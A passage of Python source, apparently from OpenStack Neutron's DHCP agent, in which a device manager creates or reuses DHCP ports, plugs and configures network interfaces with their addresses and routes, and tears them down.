                        ' does not yet exist.'), {'device_id': device_id,
                                                  'network_id': network.id})
            port_dict = dict(
                name='',
                admin_state_up=True,
                device_id=device_id,
                network_id=network.id,
                tenant_id=network.tenant_id,
                fixed_ips=[dict(subnet_id=s) for s in dhcp_enabled_subnet_ids])
            dhcp_port = self.plugin.create_dhcp_port({'port': port_dict})
        if not dhcp_port:
            raise exceptions.Conflict()
        # Convert subnet_id to subnet dict
        fixed_ips = [dict(subnet_id=fixed_ip.subnet_id,
                          ip_address=fixed_ip.ip_address,
                          subnet=subnets[fixed_ip.subnet_id])
                     for fixed_ip in dhcp_port.fixed_ips]
        ips = [DictModel(item) if isinstance(item, dict) else item
               for item in fixed_ips]
        dhcp_port.fixed_ips = ips
        return dhcp_port
    def setup(self, network, reuse_existing=False):
        """Create and initialize a device for network's DHCP on this host.

        Raises PreexistingDeviceFailure when the interface already exists
        and reuse_existing is False.  Returns the interface name.
        """
        port = self.setup_dhcp_port(network)
        interface_name = self.get_interface_name(network, port)
        if ip_lib.device_exists(interface_name,
                                self.root_helper,
                                network.namespace):
            if not reuse_existing:
                raise exceptions.PreexistingDeviceFailure(
                    dev_name=interface_name)
            LOG.debug(_('Reusing existing device: %s.'), interface_name)
        else:
            self.driver.plug(network.id,
                             port.id,
                             interface_name,
                             port.mac_address,
                             namespace=network.namespace)
        # Build CIDR addresses for every fixed IP the DHCP port holds.
        ip_cidrs = []
        for fixed_ip in port.fixed_ips:
            subnet = fixed_ip.subnet
            net = netaddr.IPNetwork(subnet.cidr)
            ip_cidr = '%s/%s' % (fixed_ip.ip_address, net.prefixlen)
            ip_cidrs.append(ip_cidr)
        # The interface also answers on the metadata address when serving
        # isolated-metadata from inside a namespace.
        if (self.conf.enable_isolated_metadata and
            self.conf.use_namespaces):
            ip_cidrs.append(METADATA_DEFAULT_CIDR)
        self.driver.init_l3(interface_name, ip_cidrs,
                            namespace=network.namespace)
        # ensure that the dhcp interface is first in the list
        if network.namespace is None:
            device = ip_lib.IPDevice(interface_name,
                                     self.root_helper)
            device.route.pullup_route(interface_name)
        if self.conf.use_namespaces:
            self._set_default_route(network, port)
        return interface_name
    def update(self, network):
        """Update device settings for the network's DHCP on this host."""
        if self.conf.use_namespaces:
            device_id = self.get_device_id(network)
            port = self.plugin.get_dhcp_port(network.id, device_id)
            if not port:
                raise exceptions.NetworkNotFound(net_id=network.id)
            self._set_default_route(network, port)
    def destroy(self, network, device_name):
        """Destroy the device used for the network's DHCP on this host."""
        self.driver.unplug(device_name, namespace=network.namespace)
        # Release the Neutron port only after the local device is gone.
        self.plugin.release_dhcp_port(network.id,
                                      self.get_device_id(network))